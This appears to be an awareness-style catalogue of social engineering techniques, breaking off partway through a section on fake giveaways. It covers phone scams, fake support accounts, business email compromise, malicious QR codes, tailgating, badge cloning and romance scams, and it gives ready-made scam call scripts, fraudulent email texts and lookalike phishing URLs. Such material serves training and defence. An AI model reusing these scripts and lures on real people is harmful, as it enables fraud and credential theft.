An attacker calls a victim, claiming to be from their bank's fraud department. They say there was unusual activity on the victim's account and ask the victim to verify their identity by providing sensitive information.
Example Script:

"Hello, this is Sarah from [Bank Name] Fraud Department. We noticed suspicious activity on your account. To secure your account, please verify your account number and PIN."

2. IRS or Tax Department Scam

Scenario:
The attacker impersonates an IRS agent or tax authority, claiming that the victim owes taxes or has legal issues. They threaten the victim with arrest or legal action if immediate payment isn't made.
Example Script:

"This is Officer James from the IRS. We’ve identified a tax discrepancy under your name. If you don’t make an immediate payment or call us back, you’ll be arrested."

3. Tech Support Scam

Scenario:
The attacker pretends to be from a legitimate tech company (e.g., Microsoft or Apple). They tell the victim their computer is infected with a virus and ask for remote access to fix it or request payment for services.
Example Script:

"Hi, this is Michael from Microsoft Technical Support. Your computer has been infected with a virus. We need to access your computer remotely to fix it. For a one-time fee, we can clean it up."

4. Prize or Sweepstakes Scam

Scenario:
The attacker calls the victim to inform them they've won a large sum of money or a free vacation, but they need to provide personal details, such as bank account information, in order to claim the prize.
Example Script:

"Congratulations! You’ve won a $1,000 gift card in our sweepstakes! Please provide your bank details to verify and receive your prize."

5. Health Insurance Scam

Scenario:
The attacker pretends to be from a health insurance company, claiming the victim is eligible for a new plan or special offer. They request personal details, like Social Security numbers or medical information, to process the "offer."
Example Script:

"This is Laura from [Insurance Company]. We’re offering an upgrade to your health plan, but we need your Social Security number to complete the enrollment process."

6. Utility Bill Scam

Scenario:
The attacker claims to be from the victim’s utility company (electricity, water, etc.) and threatens to shut off services unless the victim makes an immediate payment via wire transfer or gift cards.
Example Script:

"Hi, this is Joe from [Utility Company]. Your payment is overdue, and unless you pay immediately, we’ll disconnect your service. Please make a payment over the phone now."

Angler Phishing: Using Fake Social Media Support Accounts

Description:

Angler phishing is a type of social engineering attack where cybercriminals create fake support accounts on popular social media platforms like Twitter, Facebook, or Instagram. These fake accounts mimic legitimate customer support channels to deceive users into revealing sensitive information or clicking on malicious links.

How it Works:

Impersonation: Attackers create fake support accounts using the same logo, name, and username as official brands or companies.
Luring Users: Fake accounts respond to public complaints or direct messages, appearing as official customer support.
Phishing Message: After initiating contact, attackers ask for personal information or prompt users to download malicious files or visit phishing sites.

Example Scenarios:

1. Fake Twitter Customer Support

Scenario:
A Twitter user posts a complaint:
"I can't log into my bank account!"
A fake customer support account (e.g., @BankHelpSupport) replies publicly:
"Sorry you're having trouble! DM us your account details, and we’ll assist you in getting access."
Malicious Outcome:
Once the user DMs the fake account, they are prompted to provide their account credentials or download a malicious app to "fix" their account.

2. Fake Instagram Customer Support

Scenario:
A user posts about a shipping issue with an online store on Instagram.
The attacker creates a fake account named @ShopSupportOfficial and comments:
"Sorry to hear that! Please DM us your order number, and we’ll take care of it."
Malicious Outcome:
After contacting via DM, the user is directed to a phishing page that mimics the real store’s website and is asked to input credit card or personal details.

3. Fake Facebook Customer Service

Scenario:
A Facebook user posts about an issue with their mobile phone provider.
A fake support account, @MobileHelpOfficial, sends a private message:
"We see you're experiencing issues! Please reply with your phone number and account info for immediate assistance."
Malicious Outcome:
The user shares their phone number and personal details, which the attacker can then use for further social engineering or sell on the dark web.

Business Email Compromise (BEC)

Definition:

Business Email Compromise (BEC) is a form of cybercrime where attackers impersonate company executives or trusted partners to deceive employees into transferring funds, providing sensitive information, or performing unauthorized actions. BEC attacks typically involve email spoofing or hacking legitimate business email accounts.

Common BEC Techniques

1. Executive Impersonation

Description: Attackers impersonate a high-ranking official (e.g., CEO, CFO) and request transfers of funds or sensitive data.
Example:
- Subject: "URGENT: Transfer Funds to Secure Account"
- Email Body:
  
  "Hi [Employee's Name], I hope you're doing well. We are closing a significant deal and need to transfer $50,000 to our supplier right away. Please process the payment ASAP. Let me know once it is done."
- The attacker uses a similar email address (e.g., ceo@company.com vs. ceo@company.net).

2. Vendor Impersonation

Description: The attacker impersonates a vendor and asks for a change in payment details.
Example:
- Subject: "Updated Payment Information for Invoice #1023"
- Email Body:
  
  "Dear Accounts Team,
  Please note, we've updated our payment details. Kindly use the following account for all future payments. Attached is the new bank account information. Thank you for your cooperation."
- This email mimics the tone and format of legitimate vendor communications.

3. Wire Transfer Request

Description: The attacker requests an immediate wire transfer for a supposed business transaction.
Example:
- Subject: "Important: Wire Transfer Request"
- Email Body:
  
  "Hi [Employee's Name],
  I’m tied up in a meeting, and I need you to urgently process a transfer of $100,000 to the account in the attached document. The funds are for a strategic acquisition, and it must be done today."
- The attacker may attach a fake invoice or document that looks legitimate.

4. Email Spoofing with Social Engineering

Description: The attacker spoofs the email address of a trusted colleague or business partner to manipulate the target.
Example:
- Subject: "Re: Quick Approval Needed for Payment"
- Email Body:
  
  "Hey [Employee's Name],
  Can you please approve this wire transfer quickly? It’s urgent. The document is attached. Let me know once done. Thanks."
- The attacker impersonates a familiar colleague and even attaches fake documentation to seem convincing.

Social Media Recon – Using Public Profiles to Craft Believable Lures

Description:

Social media platforms (e.g., Facebook, LinkedIn, Twitter) provide attackers with valuable public information that can be used to craft highly convincing lures for phishing, spear-phishing, or impersonation attacks. By gathering personal and professional details from public profiles, attackers can design messages that are more likely to deceive the target into divulging sensitive information or clicking on malicious links.

Techniques and Examples:

💼 Example 1: LinkedIn Spear Phishing

Step 1: The attacker identifies a target employee on LinkedIn, who works in the finance department of a large company.
Step 2: The attacker finds out from the target’s profile that they recently completed a company-wide audit.
Step 3: The attacker crafts an email posing as the company's auditing team, thanking the target for their contribution and asking them to review the final audit document via an embedded link.
Step 4: The link leads to a phishing page designed to capture the victim’s login credentials.

📱 Example 2: Facebook Friendship Exploitation

Step 1: The attacker examines the victim’s Facebook profile and identifies a close relationship with a mutual friend.
Step 2: The attacker sends a message to the victim, pretending to be their mutual friend, saying: “Hey, I found something awesome, check this link, it’s important!”
Step 3: The link leads to a fake login page or malicious download, disguised as something the victim would find interesting.

📧 Example 3: Twitter Impersonation

Step 1: The attacker finds a Twitter account of a high-profile individual or company and observes their regular tweets.
Step 2: The attacker creates a fake account mimicking the style and tone of the real individual.
Step 3: The attacker tweets to the victim: “Hi, I heard you're attending the XYZ event! I’ve got your special access pass ready! DM me to confirm details.”
Step 4: The victim clicks a malicious link to provide personal details or login credentials.

💻 Example 4: Instagram Scam via Fake Charity

Step 1: The attacker browses the victim’s Instagram to see they are passionate about charity work and post about attending charity events or supporting non-profits.
Step 2: The attacker creates a fake charity organization Instagram account, using stolen images and descriptions.
Step 3: The attacker posts: “We're hosting a charity gala next week. We’re raising funds for XYZ cause and could use your help to get the word out!” The victim is encouraged to share the post and click a donation link.
Step 4: The donation link leads to a fake payment page designed to collect financial information.

🧠 Malicious QR Codes (Quishing) - Social Engineering Technique

Malicious QR codes, also known as Quishing, are a social engineering technique used by attackers to trick victims into visiting malicious websites or downloading malware by disguising dangerous URLs as QR codes. These are often placed in public spaces, shared via email, or embedded in posters, pretending to be legitimate services like payments, Wi-Fi access, or event check-ins.

📌 What is Quishing?

Quishing is the practice of replacing legitimate QR codes with phishing or malware-delivery links. Victims scan these codes using their smartphones, believing them to be trustworthy (e.g., for menus, payments, or check-ins), but are silently redirected to malicious content.

⚠️ How It Works

Attacker generates a QR code pointing to a malicious or phishing URL.
They print it and place it in high-traffic areas (like cafes, parking meters, conference halls).
Victims scan it with their phone's camera.
The QR code redirects them to:
- A fake login page
- A malware download
- A form to steal personal data

🧪 Examples

✅ Example 1: Fake Payment QR

Context: On a parking meter or restaurant table.
URL: http://paypal-login.paymnt-verify[.]com
Trick: Victim is asked to log into “PayPal” and enters real credentials.

✅ Example 2: Fake Wi-Fi QR Code

Context: Free Wi-Fi QR in a coffee shop.
URL: http://freewifi-coffeeshop[.]info
Trick: Leads to a fake Wi-Fi login page stealing Google/Facebook logins.

✅ Example 3: Fake App Download

Context: Poster claiming to offer a “COVID-19 tracking app” or “banking app”.
URL: http://get-bankapp-download[.]cc
Trick: Victim downloads a malicious APK file on Android or visits a phishing site.

✅ Example 4: Event Check-In QR

Context: Fake check-in banner at an event or tech conference.
URL: http://event-attendee-checkin[.]xyz
Trick: Harvests names, email addresses, and company details for future attacks.

🎭 Fake Surveys and Forms – Social Engineering Technique

Fake surveys and forms are a common yet dangerous form of social engineering used by attackers to trick users into revealing sensitive information, such as login credentials, personal identity data, or even financial details. These attacks often appear legitimate and use trusted branding or internal-looking templates to lure victims.

🚨 What is it?

Fake Surveys/Forms involve:

Sending links to fraudulent login pages, questionnaires, or giveaway surveys.
Masquerading as trusted sources (Google, HR teams, government health departments, etc.).
Collecting private data under false pretenses.

🎯 Purpose

Attackers use this technique to:

Steal credentials
Harvest Personally Identifiable Information (PII)
Collect answers to common security questions
Deploy malware via redirect links

🧪 Examples

📄 Example 1: Fake Google Docs Login

A user receives a message:

"You've been tagged in a document – click to view."

They’re redirected to a fake login page:

https://secure-gdoc-access.com/login

Once credentials are entered, they’re sent to the attacker.

🧑‍💼 Example 2: HR Feedback Form

A corporate user gets:

"We’re collecting anonymous manager feedback. Fill out this quick form."

The form asks for:

Name
Email
Office 365 credentials for ‘verification’

🎁 Example 3: Giveaway Survey

Seen on social media or WhatsApp:

"🎉 Win a free iPhone 15 – Complete our survey!"

The survey collects:

Personal details
Credit card info for "shipping"
Uploaded ID documents

🦠 Example 4: COVID-19 Scam Survey

Fake health departments asked users to:

"Book your free vaccine by filling out this form."

This was used to steal identities during the pandemic.

🎭 Fake Job Offers – Social Engineering via LinkedIn

📌 Overview

Fake job offers are a popular social engineering technique used by attackers to gain trust, steal sensitive personal information, or deliver malware. These scams are often executed on professional networking sites like LinkedIn, where attackers pretend to be recruiters from reputed companies.

🎯 Goal of the Attack

Steal personal data like resume, phone number, address, etc.
Deliver malicious files (usually documents with macros)
Harvest credentials through fake login portals
Perform identity theft or targeted spear-phishing

🧠 How It Works

Create a convincing fake recruiter profile
- Posing as HR or hiring manager from top companies
- Uses company logos, fake endorsements, and job titles
Reach out to targets via direct messages
- Offers high-paying or exciting roles
- Creates urgency to increase response chances
Trick the victim
- Asking for personal details
- Sending malware-infected attachments
- Directing victims to phishing websites

🧪 Realistic Examples

Example 1: Information Theft

"Hi Abhinav, I’m hiring for a Cybersecurity Analyst role at Microsoft India. Based on your experience, you’re a perfect fit. Please send your updated resume, phone number, and current address for background verification. We’re fast-tracking this role."

🎯 Objective: Collect sensitive personal information

Example 2: Malware Delivery

"Hey! We loved your profile and would like to proceed. Please download the attached onboarding form and fill it. Kindly enable editing and macros."

📎 Attached file contains malicious macros to infect the system

Example 3: Credential Harvesting

"To proceed with your job application, please fill out this pre-screening form."
https://malicious-site.in/secure-login

🔗 Link leads to a fake login page mimicking a real platform like Google or HR portals

🎭 Deepfakes & Voice AI in Social Engineering

This section highlights how attackers use AI-generated deepfakes (voice and video) to impersonate trusted individuals and manipulate victims. These advanced social engineering techniques are becoming increasingly common and dangerous in cybersecurity.

🧠 What Are Deepfakes & Voice AI?

Voice AI: Uses AI to clone a person’s voice and create convincing fake audio messages or phone calls.
Video Deepfakes: Uses AI to mimic someone’s face and voice in videos, often deployed in fake video calls.

🔊 Voice AI Example: CEO Voice Scam

📌 Scenario:
Attackers cloned the CEO’s voice using AI and called the company’s finance officer.

🎯 Objective:
Trick the officer into wiring €220,000 to a fake account.

✅ Result:
The transfer was completed before the scam was discovered.

📰 Source:
WSJ Report – AI Voice Deepfake Fraud

🎥 Video Deepfake Example: Fake Boss on Zoom

📌 Scenario:
Employees joined a fake Zoom call with what looked like their manager.

🎯 Objective:
Convince them to share sensitive files and approve internal transactions.

✅ Result:
Some employees complied before discovering the deception.

🛠️ Tools Used in Attacks

Type	Tools
Voice Cloning	ElevenLabs, Resemble.ai, Descript Overdub
Video Deepfakes	DeepFaceLab, FaceSwap, DeepfakeWeb

🚪 Tailgating – Social Engineering Technique

Tailgating is a physical social engineering method where an attacker gains unauthorized access to restricted areas by following closely behind an authorized person. This technique takes advantage of human kindness, social pressure, or inattention to bypass physical security measures.

🧠 What is Tailgating?

Tailgating (also known as "piggybacking") involves an attacker entering a secure building or room by walking behind someone who has legitimate access, often without raising suspicion.

🔍 Real-World Examples

📦 Example 1: Delivery Disguise

An attacker poses as a delivery person with fake packages. They approach an office entrance and ask, “Could you hold the door? I’ve got my hands full.” An employee, trying to help, opens the door—granting the attacker access.

💼 Example 2: Forgot My Badge

A person dressed professionally waits outside and says, “I forgot my access card—can you let me in?” This simple trick often works, especially in busy environments.

🧽 Example 3: Fake Janitor at Night

Late in the evening, someone dressed as a cleaner follows an employee inside. Since janitors are expected during off-hours, they’re rarely questioned.

Piggybacking

Description:

Piggybacking is a social engineering technique where an attacker gains unauthorized physical access to a restricted area by following an authorized individual. The attacker exploits the trust or politeness of someone who holds the door open or grants them access without verifying their identity.

Example:

Scenario:
An attacker dresses as a delivery person (or any trusted role) carrying a package and approaches a secured building (e.g., office, lab, or server room). They wait for an employee to open the door and either follow them in or ask for assistance.
Execution:
The attacker may say:
- “Hi, I’m from the delivery service. Could you please let me in?”
- Or they simply follow closely behind an employee entering the building without any resistance.
Result:
Once inside, the attacker may attempt to:
- Access sensitive systems,
- Steal documents, or
- Plant surveillance equipment in restricted areas.

Shoulder Surfing - Watching Someone Enter PINs/Passwords

Shoulder surfing is a social engineering technique where an attacker observes a victim entering sensitive information, such as PINs, passwords, or credit card details. The attacker uses this information for malicious purposes, often in public places like cafes, ATMs, or airports. This technique can also be employed remotely using surveillance tools.

Examples

1. ATM Shoulder Surfing

Scenario:
An individual is using an ATM to withdraw money. The attacker stands close behind them, casually observing while the victim types in their PIN.
How the Attack Happens:
The attacker memorizes the PIN or records it discreetly using a phone or camera. Later, they use the captured PIN for unauthorized transactions.

2. Public Wi-Fi or Cafes

Scenario:
A person logs into their online banking account while sitting in a crowded cafe. The attacker, seated nearby, watches over their shoulder.
How the Attack Happens:
The attacker notes down the victim's username and password as they type them on their device. The attacker may later use these credentials to access the victim's accounts.

3. Smartphone Shoulder Surfing

Scenario:
A victim is entering their phone's unlock PIN or password in a subway or on a crowded bus. The attacker is close by, watching their screen.
How the Attack Happens:
The attacker memorizes the PIN/password or secretly records it using a camera. The attacker may use this to access the victim's sensitive apps, such as banking or email.

4. ATM "Shoulder Surfing" with Hidden Cameras

Scenario:
A criminal installs a hidden camera near an ATM to record users' PIN entries.
How the Attack Happens:
The attacker collects video recordings of users entering their PINs, which are later used for financial fraud.

5. Credit Card Shoulder Surfing

Scenario:
A shopper enters their PIN at the point of sale terminal in a crowded store. The attacker stands in line behind them and peeks over their shoulder.
How the Attack Happens:
The attacker memorizes the credit card PIN and later uses it for unauthorized purchases or withdrawals.

Dumpster Diving: Retrieving Info from Physical Trash

What is Dumpster Diving?

Dumpster diving in cybersecurity refers to the practice of searching through discarded materials, such as trash, recycling, or discarded electronics, to recover sensitive data that can be used for malicious purposes. Attackers sift through physical trash to find valuable information, including personal and business data, passwords, financial details, and much more.

Common Information Retrieved in Dumpster Diving:

Personal Documents:
- Receipts, bank statements, utility bills, etc.
- Example: A discarded bank statement containing an account number or other sensitive details that can be used for identity theft.
Passwords:
- Written or printed passwords.
- Example: A sticky note with a password like "Password123" found in a trash bin.
Business Documents:
- Internal memos, meeting notes, or business cards.
- Example: A memo listing employee access codes or confidential business strategies.
Old Hardware:
- Computers, phones, or hard drives that may still contain data.
- Example: A discarded hard drive containing sensitive company files, client data, or login credentials.
Receipts or Invoices:
- Documents containing transaction details, credit card numbers, etc.
- Example: A receipt with the full card number of a company’s corporate credit card.
Internal Reports or Contracts:
- Example: Discarded contract papers with details about a company’s operations, intellectual property, or confidential deals.
Discarded Storage Media:
- CD/DVDs, flash drives, old SD cards.
- Example: A USB drive with unencrypted documents containing customer data or internal databases.
Old Identity Documents:
- Passports, driver’s licenses, or ID cards.
- Example: A discarded expired driver’s license that could be used for social engineering.

Examples of Dumpster Diving Attacks:

Example 1: Identity Theft
- Scenario: An attacker finds a company’s employee payroll list in a dumpster. Using this information, the attacker impersonates an employee to gain access to company systems or steal funds.
Example 2: Phishing / Social Engineering
- Scenario: An attacker finds a discarded business card that has a company’s email and phone number. The attacker calls the company, impersonating a client, and gathers additional sensitive information from unassuming employees.
Example 3: Espionage / Data Breach
- Scenario: An attacker retrieves a trash bag from a company's trash can, which contains confidential project plans. They use this information to sell it to a competitor or leak it publicly.
Example 4: Social Engineering / Account Takeover
- Scenario: A hacker finds old documents with bank account details or login credentials in the trash. They use this information to initiate fraudulent activity on the accounts.

Impersonation (On-site) – Cybersecurity Social Engineering Technique

Description

Impersonation (On-site) is a social engineering technique where an attacker pretends to be a trusted individual, such as an IT technician, maintenance worker, or delivery personnel, to gain unauthorized access to secure areas, devices, or sensitive information. This method exploits the trust placed in legitimate personnel roles to manipulate individuals into revealing confidential data, granting physical access to restricted areas, or assisting the attacker in other ways.

Examples

1. Pretending to be IT Support

Scenario:
An attacker visits an office building and claims to be a new IT support technician. They state that they need access to computers for "routine system updates" or "security patches." Employees, trusting the persona, allow them to plug in a USB or provide access to their devices.
Goal:
Gain unauthorized access to the system or install malicious software (e.g., keyloggers, malware).

2. Maintenance Worker

Scenario:
The attacker impersonates a maintenance worker responsible for repairing equipment such as photocopiers or HVAC systems. They claim they need to access restricted areas for inspections or repairs. The attacker then uses this opportunity to access sensitive documents or networked devices.
Goal:
Access restricted areas or sensitive documents left unattended by employees.

3. Delivery Personnel

Scenario:
The attacker poses as a delivery person, claiming to be delivering a package or equipment. They may have a fake invoice or tracking number to appear legitimate. Employees often trust the attacker and grant access to secure areas to "deliver" the package.
Goal:
Plant malicious devices (e.g., USB drives) or steal physical documents.

4. Cleaning Crew or Janitor

Scenario:
An attacker impersonates a member of the cleaning crew, entering the building after hours to exploit the lack of supervision. They may access unattended computers, desks, or documents.
Goal:
Gather sensitive information, photograph documents, or steal equipment.

5. Fake Auditor

Scenario:
An attacker impersonates an auditor or compliance officer, claiming that they need to inspect areas or data for regulatory purposes. They may request passwords or other sensitive information under the guise of compliance auditing.
Goal:
Extract sensitive business data or financial information.

Evil Maid Attack – Tampering with Unattended Devices

The Evil Maid Attack is a physical security vulnerability where an attacker gains access to an unattended device (e.g., a laptop or smartphone) and tamper with it to gain unauthorized access. The name comes from the idea that someone with temporary physical access (e.g., a maid or hotel staff) could perform this attack while the device's owner is away.

Common Techniques in Evil Maid Attacks:

USB Keylogger Installation
An attacker can install a USB keylogger that silently records keystrokes, capturing login credentials and sensitive information.

Example:
A victim leaves their laptop unattended in a hotel room, and an attacker installs a USB keylogger that records login credentials when the user returns.
Modifying Boot Loader or BIOS
By altering the bootloader or BIOS settings, an attacker can bypass system security measures.

Example:
The attacker modifies the BIOS of the victim’s laptop to execute a malicious USB device during boot, granting access before the owner logs in.
Installing a Backdoor
The attacker installs a backdoor on the device to gain remote access at any time.

Example:
The attacker installs a Remote Access Trojan (RAT) on the victim's laptop, enabling them to control the device remotely.
Disk Encryption Tampering
The attacker may disable or bypass disk encryption settings (e.g., BitLocker or FileVault), exposing sensitive data.

Example:
The attacker disables the disk encryption, allowing them to access files stored on the device, even if the owner has encrypted the data.
Evil Maid Attack with a Bootable USB Stick
The attacker can use a malicious USB drive to reinstall or clean-install the operating system, removing traces of the victim’s data.

Example:
The attacker boots the victim’s device from a USB stick, wiping the hard drive and installing software to maintain access while erasing the victim’s data.

Badge Cloning / Fake IDs – Gaining Access via Fake Credentials

🚨 Overview

Badge cloning and fake IDs are social engineering techniques that allow attackers to gain unauthorized physical access to secure areas by using forged credentials or cloned access badges. This method exploits the physical security gaps in organizations, particularly those relying on RFID badges or ID cards for entry control.

🧠 How It Works

1. Cloning RFID Badges

RFID-enabled access badges are commonly used in organizations for physical access control. An attacker can clone a badge using specialized RFID readers and writers. By copying the unique identifier stored on a legitimate badge, they can create a cloned badge that provides the same level of access to secure areas.

Example: An attacker uses an RFID reader to capture an employee’s badge ID while they're working in a café. Later, the attacker uses the cloned badge to gain unauthorized access to the company’s restricted server room.

2. Creating Fake IDs

In this technique, attackers forge an identification card that mimics an employee’s or visitor's legitimate credentials. The attacker can print, laminate, and assemble a fake badge that looks indistinguishable from the original.

Example: The attacker creates a fake delivery person badge with the company logo, photo of an employee, and other details to gain access to the company premises.

3. Social Engineering for Fake ID Creation

Sometimes, attackers use social engineering to gather the necessary details to create fake IDs. They might impersonate an internal staff member, like HR or IT, and convince others to provide employee photos or information under false pretenses.

Example: An attacker posing as an IT technician contacts the HR department and requests an employee photo to "update" their internal systems, later using this photo to create a forged ID.

🌍 Real-World Example

In a well-known case, a security researcher used a fake contractor badge to gain access to an office building. The researcher was able to bypass the building's physical security measures by following legitimate employees into restricted areas, such as server rooms, and walking around without suspicion. The fake contractor badge was nearly identical to real badges issued by the company, allowing the attacker to pass security checkpoints.

Tactics Used:
- Creation of a fake contractor badge with the company logo and employee photo.
- “Tailgating” – following an authorized employee into a secure building using the fake badge.
- Gaining access to restricted areas, including high-value zones like server rooms.

Watering Hole Attack - Cybersecurity Social Engineering Technique

Description

A Watering Hole Attack is a social engineering technique in which an attacker compromises a website that is frequently visited by their target audience. By infecting the website with malicious content, the attacker aims to exploit vulnerabilities in the visitors' systems and steal sensitive information or infect their devices with malware.

The term "watering hole" comes from predators waiting near a water source to capture prey when they come to drink. Similarly, attackers wait for their targets to visit compromised websites and exploit them once they do.

Example 1: Targeting an Organization

Scenario:

An attacker targets a company by compromising a popular industry-related news website that the company's employees regularly visit.

Steps:

The attacker gains control over the website (via XSS, SQL injection, or other vulnerabilities).
They inject malicious code (JavaScript, malware, etc.) into the site to exploit vulnerabilities in employees' browsers or software.
Employees visit the website, and upon loading the compromised page, they unknowingly download malware.
The attacker gains access to sensitive company data, credentials, or internal systems.

Real-World Example:

In 2015, Hacking Team, an Italian surveillance company, was targeted by a watering hole attack. The attackers compromised a website visited by Hacking Team employees, embedding malware to gain access to their internal systems.

Example 2: Targeting Individuals in a Specific Industry

Scenario:

An attacker targets individuals working in the finance industry by compromising a trusted financial community website.

Steps:

The attacker compromises the website, exploiting vulnerabilities in its platform or injecting malicious code.
They use this to inject malware into the page, such as a JavaScript payload designed to exploit browser vulnerabilities.
When financial professionals visit the site, their systems become infected.
The attacker gains access to sensitive financial data or login credentials.

Real-World Example:

In 2011, RSA (part of EMC) fell victim to a watering hole attack targeting its employees. The attackers compromised a website that RSA employees regularly visited, infecting them with malware that led to the theft of sensitive data.

Example 3: Political Targeting

Scenario:

An attacker targets journalists or activists visiting political news websites.

Steps:

The attacker infects the website with malicious content designed to exploit a browser or plugin vulnerability.
Journalists visit the site, and their systems are infected without their knowledge.
The attacker steals sensitive political information, such as drafts or confidential sources.

Real-World Example:

APT28 (Fancy Bear) used a watering hole attack in 2017, targeting political journalists and dissidents. They infected a website with malware to gain access to the targets' systems and gather sensitive political information.

Reverse Social Engineering

Description:

Reverse social engineering involves the attacker inducing the victim to ask for help. The attacker sets up a scenario where the victim feels compelled to seek help from them, either by phone, email, or in-person. This is a manipulative technique that takes advantage of trust and authority to exploit the victim’s need for assistance.

How it Works:

Create a Problem (Usually Fabricated): The attacker creates a scenario where the victim believes they have a serious problem (e.g., system failure, account breach).
Offer Assistance: The attacker presents themselves as a trusted source of help (e.g., IT support, customer service).
Induce Contact: The attacker encourages the victim to reach out to them for assistance.
Victim Contacts the Attacker: The victim reaches out, handing over information that the attacker uses for malicious purposes.

Examples of Reverse Social Engineering:

1. Fake IT Support Scenario

Attackers’ Actions:
The attacker sends an email or calls the victim claiming that they’ve detected a security issue on the victim’s device or network. They provide a contact number or email for the victim to reach out to for assistance.

Example Message:
“Our monitoring system has flagged unusual activity on your network. Please contact IT support at [phone number] immediately to resolve this issue. Failure to act may result in data loss.”
Victim’s Actions:
The victim, believing this warning is legitimate, calls the number and provides details about their system, potentially revealing credentials or allowing remote access to the attacker.

2. Malware Infection Scenario

Attackers’ Actions:
The attacker deliberately infects the victim’s system with malware that causes errors or system failure. The attacker then leaves a phone number or website for "technical support."

Example Message:
“Your system has been compromised. Please call [phone number] to speak with an expert who can resolve the issue immediately.”
Victim’s Actions:
The victim contacts the attacker and, thinking they’re calling for help, ends up handing over control of their system to the attacker, potentially leading to data theft or further exploitation.

3. Fake Account Recovery

Attackers’ Actions:
The attacker targets a user’s social media or bank account and, through phishing or social engineering, gets the victim to believe their account has been compromised. They then offer to help recover it by pretending to be a support agent.

Example Message:
“We noticed suspicious activity on your account. Call us at [phone number] to verify your identity and recover your account.”
Victim’s Actions:
The victim contacts the attacker, provides personal details, and allows the attacker to "help" them recover access to their account. The attacker might then hijack the account.

4. Fake Product or Service Support

Attackers’ Actions:
The attacker creates a fake customer service center, often posing as a representative of a popular product or service. The attacker might leave fake contact details on a website or through a phishing email.

Example Message:
“Hello, we’ve detected a problem with your recent order. Please contact us at [email/phone] so we can assist you with a refund or replacement.”
Victim’s Actions:
The victim, thinking they're resolving a legitimate issue, contacts the attacker and may be tricked into providing sensitive personal information or payment details.

5. Fake Social Engineering Attack

Attackers’ Actions:
The attacker tricks the victim into thinking they’ve fallen victim to a social engineering attack (e.g., phishing). The attacker then offers to help “secure” the victim’s information.

Example Message:
“It appears your email was compromised due to a phishing attack. Please contact us immediately at [phone number] for a free security check-up.”
Victim’s Actions:
The victim reaches out, unknowingly handing over login credentials or allowing the attacker to access sensitive accounts.

Hybrid Attacks: Blending Phishing with Vishing

Description:

A hybrid attack combines phishing (online social engineering) and vishing (voice-based social engineering). The attacker uses a multi-step approach to gain trust by combining online deception with direct phone-based manipulation. The goal is to exploit the victim’s trust using both mediums.

Example 1: "Check Your Email I Just Sent"

Step 1 (Phishing Email): The attacker sends a well-crafted phishing email posing as the victim's bank or a legitimate service they use. The email urges the victim to click on a fraudulent link.

Subject: Urgent Action Required: Security Alert on Your Account Body: Dear [Victim Name], We've noticed unusual activity on your account. Please check the attached message for important updates regarding your account security. Click the link to verify your details and avoid account suspension. (Link leads to a phishing website mimicking the bank's official website)

Step 2 (Vishing Follow-Up): After the victim clicks on the link, the attacker calls the victim pretending to be from the bank, asking them for sensitive information.

Phone Call: "Hello, this is [Fake Bank Representative] from [Victim’s Bank]. I see you recently tried to verify your account information online but the system flagged your request. Can you confirm your full name, address, and social security number for verification purposes to protect your account?"

Outcome: The victim unknowingly provides sensitive information to the attacker.

Example 2: "System Update Notice"

Step 1 (Phishing Email): The attacker sends a phishing email pretending to be IT Support, asking the victim to download a malicious attachment for a system update.

Subject: System Update Alert: Action Required Body: Dear [Victim Name], We need to update your system security. Please download the attached file to continue the update. This is a required update to keep your system running securely. (Attachment is a malicious file)

Step 2 (Vishing Follow-Up): Once the victim opens the file (which infects their system with malware), the attacker calls pretending to be IT support, asking for login credentials.

Phone Call: "Hi [Victim Name], this is [Fake IT Staff]. I noticed you’ve initiated the system update. We’ve flagged your system for unusual activity. Could you please confirm your login credentials so we can proceed with the update?"

Outcome: The victim discloses sensitive login credentials.

Example 3: "Prize Winner Notification"

Step 1 (Phishing Email): The attacker sends a phishing email claiming the victim has won a prize, asking them to fill out a form.

Subject: Congratulations! You've Won a $1,000 Gift Card! Body: Dear [Victim Name], You've won a $1,000 gift card! To claim your prize, click here and fill out a quick survey to confirm your shipping address. (Link leads to a phishing form asking for personal details)

Step 2 (Vishing Follow-Up): After the victim submits their details, the attacker calls pretending to be a representative of the prize company, asking for credit card details to finalize the prize shipment.

Phone Call: "Hi [Victim Name], this is [Fake Representative] from [Prize Company]. We received your claim for the $1,000 gift card. However, we need to confirm your credit card number to finalize shipping. Can you provide that now?"

Outcome: The victim provides credit card information.

Honey Traps / Romance Scams – Emotional Exploitation for Info or Money

Description:

Honey traps (also known as romance scams) are a form of emotional manipulation in which an attacker builds a romantic relationship with the victim in order to exploit them for money or personal information. The scammer typically pretends to be someone seeking emotional connection, creating a sense of trust and affection over time. Once the emotional bond is established, the scammer will manipulate the victim into providing money or sensitive data under false pretenses.

Real-World Examples:

Example 1: The Long-Distance Relationship Scam

Scenario: An attacker creates a fake online dating profile and begins a long-distance relationship with the victim, gaining their trust over several weeks or months.
Steps:
1. Initial Contact: The scammer engages the victim with fake stories of shared interests.
2. Trust Development: As the relationship progresses, the scammer builds emotional bonds.
3. The Emotional Appeal: The attacker claims to have a financial emergency, needing money to return home or resolve a crisis.
4. Exploitation: Victim is asked to send money to help the scammer return home or resolve the emergency.
Example Phrase:

"I miss you so much. I’ve been stuck here in this foreign country, and I really need your help to get back. Please send me $2,000, and I’ll pay you back as soon as I return."

Example 2: Fake Investment or Business Opportunity

Scenario: A scammer builds a romantic relationship, then offers a fake business or investment opportunity, claiming it will help both of them grow financially.
Steps:
1. Initial Contact: The scammer connects with the victim, claiming to be an experienced entrepreneur.
2. Relationship Development: They form a close relationship based on mutual business interests.
3. The Pitch: After building trust, the scammer proposes a business deal or investment opportunity.
4. Exploitation: The victim is convinced to invest money, believing they’ll make substantial returns.
Example Phrase:

"This is the perfect opportunity to make some real money. If you invest now, we can grow this together. I need your help, and I’ll pay you back once it’s successful."

Example 3: Fake Military or Emergency Scam

Scenario: The attacker pretends to be an active military member or worker stranded abroad, needing financial assistance to return home.
Steps:
1. Initial Contact: The scammer poses as a soldier or worker in a foreign country.
2. Relationship Development: Over time, they establish an emotional connection with the victim.
3. The Emergency: The scammer claims to be in a dangerous situation, requiring money to return home or cover medical bills.
4. Exploitation: The victim is asked to send money out of sympathy or concern for the scammer's safety.
Example Phrase:

"I’ve been injured while working here, and the army is not covering the expenses. I need your help to get back home. Can you send $3,000 to help me return?"

Fake Contests / Giveaways

Description:

Fake contests and giveaways are one of the most common social engineering techniques used to collect personal information from victims. These scams promise valuable prizes (such as free iPhones, gift cards, or electronics) but are designed to trick people into submitting their personal information or performing certain actions that benefit the attacker.

Example:

Fake iPhone Giveaway via Social Media:
- Scenario: A popular influencer posts on Instagram:
